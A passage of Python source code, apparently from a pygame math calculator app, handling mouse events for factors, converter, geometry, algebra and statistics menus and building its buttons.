elif self.gcf_button.button.collidepoint(mouse_pos):
self.active_button = 'gcf_button'
elif self.lcf_button.button.collidepoint(mouse_pos):
self.active_button = 'lcf_button'
# Get factors menu.
elif self.active_menu == 'get_factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_4.button.collidepoint(mouse_pos):
self.active_button = 'input_button_4'
self.active_menu = 'get_factors_input_1'
# Get factors input menu
elif self.active_menu == 'get_factors_input_1':
self.active_menu = 'get_factors_menu'
self.active_button = ''
# Common factors menu.
elif self.active_menu == 'common_factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'common_factors_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'common_factors_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'common_factors_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'common_factors_input_4'
# Common factors input menus
elif self.active_menu == 'common_factors_input_1':
self.active_menu = 'common_factors_menu'
self.active_button = ''
elif self.active_menu == 'common_factors_input_2':
self.active_menu = 'common_factors_menu'
self.active_button = ''
elif self.active_menu == 'common_factors_input_3':
self.active_menu = 'common_factors_menu'
self.active_button = ''
elif self.active_menu == 'common_factors_input_4':
self.active_menu = 'common_factors_menu'
self.active_button = ''
#GCF menu.
elif self.active_menu == 'gcf_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'gcf_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'gcf_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'gcf_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'gcf_input_4'
# Greatest common factors input menus
elif self.active_menu == 'gcf_input_1':
self.active_menu = 'gcf_menu'
self.active_button = ''
elif self.active_menu == 'gcf_input_2':
self.active_menu = 'gcf_menu'
self.active_button = ''
elif self.active_menu == 'gcf_input_3':
self.active_menu = 'gcf_menu'
self.active_button = ''
elif self.active_menu == 'gcf_input_4':
self.active_menu = 'gcf_menu'
self.active_button = ''
# LCF menu.
elif self.active_menu == 'lcf_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'lcf_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'lcf_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'lcf_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'lcf_input_4'
# Least common factors input menus
elif self.active_menu == 'lcf_input_1':
self.active_menu = 'lcf_menu'
self.active_button = ''
elif self.active_menu == 'lcf_input_2':
self.active_menu = 'lcf_menu'
self.active_button = ''
elif self.active_menu == 'lcf_input_3':
self.active_menu = 'lcf_menu'
self.active_button = ''
elif self.active_menu == 'lcf_input_4':
self.active_menu = 'lcf_menu'
self.active_button = ''
def factors_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the factors menu."""
# Main factors menu.
if self.active_menu == 'factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.get_factors_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'get_factors_menu'
self.input_buttons = 1
elif self.common_factors_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'common_factors_menu'
self.input_buttons = 4
elif self.gcf_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'gcf_menu'
self.input_buttons = 4
elif self.lcf_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'lcf_menu'
self.input_buttons = 4
else:
self.active_button = ''
# Get factors menu.
elif self.active_menu == 'get_factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('factors_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if self.input_box_4 != '':
self.input_value_4 = int(self.input_box_4)
self.answer = str(MATH.get_factors_(self.input_value_4))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Common factors menu.
elif self.active_menu == 'common_factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('factors_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.common_factors_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# GCF menu.
elif self.active_menu == 'gcf_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('factors_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.gcf_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# LCF menu.
elif self.active_menu == 'lcf_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('factors_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.lcf_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
def converters_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the converters menu."""
# Main converters menu.
if self.active_menu == 'converters_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.temp_button.button.collidepoint(mouse_pos):
self.active_button = 'temp_button'
# Temperature convert menu.
elif self.active_menu == 'temp_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_2.button.collidepoint(mouse_pos):
self.active_button = 'input_button_2'
self.active_menu = 'temp_input_1'
elif self.input_button_4.button.collidepoint(mouse_pos):
self.active_button = 'input_button_4'
self.active_menu = 'temp_input_2'
elif self.input_button_6.button.collidepoint(mouse_pos):
self.active_button = 'input_button_6'
self.active_menu = 'temp_input_3'
# Temperature input menus.
elif self.active_menu == 'temp_input_1':
self.active_menu = 'temp_menu'
self.active_button = ''
elif self.active_menu == 'temp_input_2':
self.active_menu = 'temp_menu'
self.active_button = ''
elif self.active_menu == 'temp_input_3':
self.active_menu = 'temp_menu'
self.active_button = ''
def converters_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the converters menu."""
# Main converters menu.
if self.active_menu == 'converters_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.temp_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'temp_menu'
self.input_buttons = 3
else:
self.active_button = ''
# Temperature convert menu.
elif self.active_menu == 'temp_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('converters_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if (self.input_box_2 == ''
or self.input_box_4 == ''
or self.input_box_6 == ''):
None
else:
self.input_value_2 = float(self.input_box_2)
self.input_value_4 = self.input_box_4.upper()
self.input_value_6 = self.input_box_6.upper()
self.answer = str(MATH.temperature_convert_(self.input_value_2, self.input_value_4, self.input_value_6))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
def geometry_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the geometry menu."""
# Main geometry menu.
if self.active_menu == 'geometry_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.mar_button.button.collidepoint(mouse_pos):
self.active_button = 'mar_button'
elif self.solid_polygon_button.button.collidepoint(mouse_pos):
self.active_button = 'solid_polygon_button'
# Maintain ratio menu.
elif self.active_menu == 'mar_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'mar_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'mar_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'mar_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'mar_input_4'
# Maintain ratio input menus.
elif self.active_menu == 'mar_input_1':
self.active_menu = 'mar_menu'
self.active_button = ''
elif self.active_menu == 'mar_input_2':
self.active_menu = 'mar_menu'
self.active_button = ''
elif self.active_menu == 'mar_input_3':
self.active_menu = 'mar_menu'
self.active_button = ''
elif self.active_menu == 'mar_input_4':
self.active_menu = 'mar_menu'
self.active_button = ''
# Solid polygon menu.
elif self.active_menu == 'solid_polygon_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_4.button.collidepoint(mouse_pos):
self.active_button = 'input_button_4'
self.active_menu = 'solid_polygon_input_1'
# Solid polygon input menu.
elif self.active_menu == 'solid_polygon_input_1':
self.active_menu = 'solid_polygon_menu'
self.active_button = ''
def geometry_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the geometry menu."""
# Main geometry menu.
if self.active_menu == 'geometry_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.mar_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'mar_menu'
self.input_buttons = 4
elif self.solid_polygon_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'solid_polygon_menu'
self.input_buttons = 1
else:
self.active_button = ''
# Maintain ratio menu.
elif self.active_menu == 'mar_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('geometry_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if (self.input_box_1 == ''
or self.input_box_3 == ''
or self.input_box_5 == ''
or self.input_box_7 == ''):
None
else:
self.input_value_1 = float(self.input_box_1)
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = float(self.input_box_5)
self.input_value_7 = float(self.input_box_7)
source_surf = [self.input_value_1, self.input_value_3]
dest_surf = [self.input_value_5, self.input_value_7]
try:
self.answer = str(MATH.maintain_aspect_ratio_(
source_surf, dest_surf))
except ZeroDivisionError:
pass
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Solid polygon menu.
elif self.active_menu == 'solid_polygon_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('geometry_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if self.input_box_4 != '':
self.input_value_4 = int(self.input_box_4)
self.answer = MATH.solid_polygon_info_(self.input_value_4)
self.answer = f'Edges = {self.answer["edges"]}, Vertices = {self.answer["vertices"]}, Faces = {self.answer["faces"]}, Triangles = {self.answer["triangles"]}'
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
def algebra_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the algebra menu."""
# Main algebra menu.
if self.active_menu == 'algebra_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.root_button.button.collidepoint(mouse_pos):
self.active_button = 'root_button'
elif self.extrapolate_button.button.collidepoint(mouse_pos):
self.active_button = 'extrapolate_button'
# Root menu.
elif self.active_menu == 'root_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'root_input_1'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'root_input_2'
# Root input menus.
elif self.active_menu == 'root_input_1':
self.active_menu = 'root_menu'
self.active_button = ''
elif self.active_menu == 'root_input_2':
self.active_menu = 'root_menu'
self.active_button = ''
# Extrapolate menu.
elif self.active_menu == 'extrapolate_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'extrapolate_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'extrapolate_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'extrapolate_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'extrapolate_input_4'
# Extrapolate input menus.
elif self.active_menu == 'extrapolate_input_1':
self.active_menu = 'extrapolate_menu'
self.active_button = ''
elif self.active_menu == 'extrapolate_input_2':
self.active_menu = 'extrapolate_menu'
self.active_button = ''
elif self.active_menu == 'extrapolate_input_3':
self.active_menu = 'extrapolate_menu'
self.active_button = ''
elif self.active_menu == 'extrapolate_input_4':
self.active_menu = 'extrapolate_menu'
self.active_button = ''
def algebra_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the algebra menu."""
# Main algebra menu.
if self.active_menu == 'algebra_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.root_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'root_menu'
self.input_buttons = 2
elif self.extrapolate_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'extrapolate_menu'
self.input_buttons = 4
else:
self.active_button = ''
# Root menu.
elif self.active_menu == 'root_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('algebra_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if self.input_box_3 == '' or self.input_box_5 == '':
None
else:
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = float(self.input_box_5)
self.answer = str(MATH.root_(self.input_value_3, self.input_value_5))
self.answer_text_x_mod = 0
self.active_button = ''
# Extrapolate menu.
elif self.active_menu == 'extrapolate_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('algebra_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
check = ['add', 'subtract', 'multiply', 'divide', 'exponent', 'root']
if (self.input_box_1 == ''
or self.input_box_3 == ''
or self.input_box_5 == ''
or self.input_box_5.lower() not in check
or self.input_box_7 == ''):
None
else:
try:
self.input_value_1 = int(self.input_box_1)
self.input_value_3 = int(self.input_box_3)
except ValueError:
self.input_value_1 = float(self.input_box_1)
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = self.input_box_5.lower()
self.input_value_7 = int(self.input_box_7)
self.answer = str(MATH.extrapolate_(self.input_value_1, self.input_value_3, self.input_value_5, self.input_value_7))
self.answer_text_x_mod = 0
self.active_button = ''
def data_processing_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the data processing menu."""
# Main data processing menu.
if self.active_menu == 'data_processing_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.average_button.button.collidepoint(mouse_pos):
self.active_button ='average_button'
elif self.median_button.button.collidepoint(mouse_pos):
self.active_button ='median_button'
elif self.mode_button.button.collidepoint(mouse_pos):
self.active_button ='mode_button'
elif self.range_button.button.collidepoint(mouse_pos):
self.active_button ='range_button'
# Average menu.
elif self.active_menu == 'average_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'average_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'average_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'average_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'average_input_4'
# Average input menus.
elif (self.active_menu == 'average_input_1'
or self.active_menu == 'average_input_2'
or self.active_menu == 'average_input_3'
or self.active_menu == 'average_input_4'):
self.active_button = ''
self.active_menu = 'average_menu'
# Median menu.
elif self.active_menu == 'median_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'median_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'median_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'median_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'median_input_4'
# Median input menus.
elif (self.active_menu == 'median_input_1'
or self.active_menu == 'median_input_2'
or self.active_menu == 'median_input_3'
or self.active_menu == 'median_input_4'):
self.active_button = ''
self.active_menu = 'median_menu'
# Mode menu.
elif self.active_menu == 'mode_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'mode_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'mode_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'mode_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'mode_input_4'
# Mode input menus.
elif (self.active_menu == 'mode_input_1'
or self.active_menu == 'mode_input_2'
or self.active_menu == 'mode_input_3'
or self.active_menu == 'mode_input_4'):
self.active_button = ''
self.active_menu = 'mode_menu'
# Range menu.
elif self.active_menu == 'range_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'range_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'range_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'range_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'range_input_4'
# Range input menus.
elif (self.active_menu == 'range_input_1'
or self.active_menu == 'range_input_2'
or self.active_menu == 'range_input_3'
or self.active_menu == 'range_input_4'):
self.active_button = ''
self.active_menu = 'range_menu'
def data_processing_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the data processing menu."""
# Main data processing menu.
if self.active_menu == 'data_processing_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.average_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'average_menu'
self.input_buttons = 4
elif self.median_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'median_menu'
self.input_buttons = 4
elif self.mode_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'mode_menu'
self.input_buttons = 4
elif self.range_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'range_menu'
self.input_buttons = 4
else:
self.active_button = ''
# Average menu.
elif self.active_menu == 'average_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('data_processing_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.average_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Median menu.
elif self.active_menu == 'median_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('data_processing_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.median_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Mode menu.
elif self.active_menu == 'mode_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('data_processing_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.mode_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Range menu.
elif self.active_menu == 'range_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('data_processing_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.range_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# GUI section.
def create_all_gui(self):
"""Quick call all of the button creation functions."""
self.active_button_color = (150,150,160)
self.idle_button_color = (210,210,220)
self.border_color = (60,60,70)
self.text_color = (0,0,0)
self.width = self.screen_rect.width * 0.25
self.height = self.screen_rect.height * 0.05
self.x_gap = self.width * 0.2
self.border_size = 0.18
if self.screen_rect.width / self.screen_rect.height >= 1.4:
self.text_size = 1.2
elif self.screen_rect.width / self.screen_rect.height >= 1:
self.text_size = 0.9
elif self.screen_rect.width / self.screen_rect.height >= 0.8:
self.text_size = 0.75
else:
self.text_size = 0.5
self.answer_text_move_amount = self.screen_rect.width*0.1
self.tiles = []
column, row = 0, 0
gap = int(self.screen_rect.width*0.001)
if gap < 1:
gap = 1
diagonal = ((self.screen_rect.width**2 + self.screen_rect.height**2)
**(1/2))
size = int(diagonal/18) - gap
x_amount = int((self.screen_rect.width/size) + 1)
y_amount = int((self.screen_rect.height/size) + 1)
amount = x_amount * y_amount
for tile in range(amount):
if column == x_amount:
column = 0
row += 1
tile = StaticButton(self,
width=size,
height=size,
button_color=(230,230,230),
align='topleft',
align_obj=self.screen_rect.topleft,
add_x=int(gap + (size + gap) * column),
add_y=int(gap + (size + gap) * row))
self.tiles.append(tile)
column += 1
self.back_button = DynamicTextButton(self,
width=self.width/2,
height=self.height,
border_size=self.border_size/2,
text_size=self.text_size,
align='topleft',
align_obj=self.screen_rect.topleft)
self.calculate_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*1.5,
border_size=self.border_size*0.75,
height=self.height*1.25,
multiply_y=1.68)
self.answer_button = DynamicTextButton(self,
text_size=self.text_size/1.5,
width=self.screen_rect.width,
border_size=self.border_size,
height=self.height*1.25,
multiply_y=1.92)
self.hover_text_help = DynamicTextButton(self,
width=self.width*3,
height=self.height*1.1,
border_size=0.17,
text_size=self.text_size,
multiply_y=0.175)
self.input_button_1 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=0.4)
self.input_button_2 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=0.6)
self.input_button_3 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=0.8)
self.input_button_4 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height)
self.input_button_5 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=1.2)
self.input_button_6 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=1.4)
self.input_button_7 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=1.6)
self.create_main_menu_gui()
self.create_converters_menu_gui()
self.create_factors_menu_gui()
self.create_geometry_menu_gui()
self.create_algebra_menu_gui()
self.create_data_processing_menu_gui()
# Main menu.
def create_main_menu_gui(self):
"""Create the buttons for the main menu."""
self.converters_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.6)
self.factors_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.8)
self.geometry_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height)
self.data_processing_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.2)
self.algebra_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.4)
def draw_main_menu_gui(self):
"""Draw the main menu."""
if self.active_button != 'factors_button':
self.factors_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Factors")
elif self.active_button == 'factors_button':
self.factors_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Factors")
if self.active_button != 'converters_button':
self.converters_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Converters")
elif self.active_button == 'converters_button':
self.converters_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Converters")
if self.active_button != 'geometry_button':
self.geometry_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Geometry")
elif self.active_button == 'geometry_button':
self.geometry_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Geometry")
if self.active_button != 'algebra_button':
self.algebra_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Algebra")
elif self.active_button == 'algebra_button':
self.algebra_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Algebra")
if self.active_button != 'data_processing_button':
self.data_processing_button.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Data Processing")
elif self.active_button == 'data_processing_button':
self.data_processing_button.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Data Processing")
# Converters menu.
def create_converters_menu_gui(self):
"""Create the buttons for the converters menu."""
self.temp_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
